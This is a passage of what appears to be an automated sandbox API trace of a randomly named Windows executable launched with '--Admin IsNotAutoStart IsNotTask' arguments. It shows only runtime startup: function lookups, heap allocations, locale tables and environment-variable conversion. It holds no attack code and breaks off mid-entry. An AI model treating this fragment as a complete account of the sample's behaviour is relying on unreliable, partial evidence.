[0101.782] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0101.782] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0101.782] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0101.782] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0101.783] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0101.783] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0101.783] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0101.783] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0101.783] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0101.783] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0101.783] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0101.783] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0101.784] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0101.784] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3bc) returned 0x74f2b8 [0101.784] GetCurrentThreadId () returned 0xb64 [0101.794] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x18) returned 0x7408a0 [0101.794] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x800) returned 0x74f680 [0101.794] GetStartupInfoW (in: lpStartupInfo=0x18e72c | out: lpStartupInfo=0x18e72c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x31ad59aa, hStdError=0x58)) [0101.794] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0101.794] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0101.794] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0101.794] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe\" --Admin IsNotAutoStart IsNotTask" [0101.795] GetEnvironmentStringsW () returned 0x74fe88* [0101.925] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xaca) returned 0x750960 [0101.936] FreeEnvironmentStringsW (penv=0x74fe88) returned 1 [0101.947] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe")) returned 0x3a [0101.947] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xcc) returned 0x74fe88 [0101.947] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x98) returned 0x74ff60 [0101.947] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3e) returned 0x744ee8 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x6c) returned 0x750000 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x6e) returned 0x750078 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x78) returned 0x742dc8 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x62) returned 0x7500f0 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x2e) returned 0x74afe8 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x48) returned 0x746b68 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x28) returned 0x74a9a8 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x1a) returned 0x74f070 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x4a) returned 0x750160 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x72) returned 0x742e48 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x30) returned 0x74b020 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x2e) returned 0x74b058 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x1c) returned 0x74f098 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0xd2) returned 0x7501b8 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x7c) returned 0x750298 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x36) returned 0x750320 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3a) returned 0x744f30 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x90) returned 0x750360 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x24) returned 0x74a9d8 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x30) returned 0x74b090 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x36) returned 0x7503f8 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x48) returned 0x746bb8 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x52) returned 0x750438 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3c) returned 0x744f78 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x82) returned 0x750498 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x2e) returned 0x74b0c8 [0101.948] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x1e) returned 0x74f0c0 [0101.949] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x2c) returned 0x74b100 [0101.949] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x54) returned 0x750528 [0101.949] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x52) returned 0x750588 [0101.949] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x2a) returned 0x74b138 [0101.949] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3c) returned 0x744fc0 [0101.949] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x54) returned 0x7505e8 [0101.949] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x24) returned 0x74aa08 [0101.949] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x30) returned 0x74b170 [0101.949] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x8c) returned 0x750648 [0101.949] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x750960 | out: hHeap=0x730000) returned 1 [0102.149] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x800) returned 0x7506e0 [0102.196] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x80) returned 0x750ee8 [0102.253] GetLastError () returned 0x0 [0102.253] IsValidCodePage (CodePage=0x4e4) returned 1 [0102.253] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e720 | out: lpCPInfo=0x18e720) returned 1 [0102.262] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e1e8 | out: lpCPInfo=0x18e1e8) returned 1 [0102.272] GetLastError () returned 0x0 [0102.281] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e5fc, cbMultiByte=256, lpWideCharStr=0x18df68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㹺CĀ") returned 256 [0102.281] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㹺CĀ", cchSrc=256, lpCharType=0x18e1fc | out: lpCharType=0x18e1fc) returned 1 [0102.282] GetLastError () returned 0x0 [0102.291] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0102.291] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x18dd28, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0102.291] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18e4fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ:Y­18ç\x18", lpUsedDefaultChar=0x0) returned 256 [0102.291] GetLastError () returned 0x0 [0102.291] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0102.291] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18dd48, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0102.291] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e3fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ:Y­18ç\x18", lpUsedDefaultChar=0x0) returned 256 [0102.312] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0102.312] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4056dc [0102.418] RtlSizeHeap (HeapHandle=0x730000, Flags=0x0, MemoryPointer=0x750ee8) returned 0x80 [0102.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0102.438] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x1f) returned 0x74f0e8 [0102.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x74f0e8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0102.448] GetLastError () returned 0x0 [0102.448] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751198, Size=0x8) returned 0x751198 [0102.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0102.449] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x36) returned 0x7511a8 [0102.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x7511a8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0102.449] GetLastError () returned 0x0 [0102.459] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751198, Size=0xc) returned 0x7511e8 [0102.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0102.459] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x37) returned 0x751200 [0102.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x751200, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0102.459] GetLastError () returned 0x0 [0102.460] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7511e8, Size=0x10) returned 0x7511e8 [0102.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0102.460] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x3c) returned 0x745008 [0102.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x745008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0102.460] GetLastError () returned 0x0 [0102.460] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x7511e8, Size=0x14) returned 0x751240 [0102.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0102.460] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x31) returned 0x751260 [0102.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x751260, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0102.460] GetLastError () returned 0x0 [0102.460] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751240, Size=0x18) returned 0x751240 [0102.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.460] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x17) returned 0x7512a0 [0102.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7512a0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0102.460] GetLastError () returned 0x0 [0102.460] RtlReAllocateHeap (Heap=0x730000, Flags=0x0, Ptr=0x751240, Size=0x1c) returned 0x7512c0 [0102.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0102.460] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x8, Size=0x24) returned 0x74aa38 [0102.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x74aa38, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", 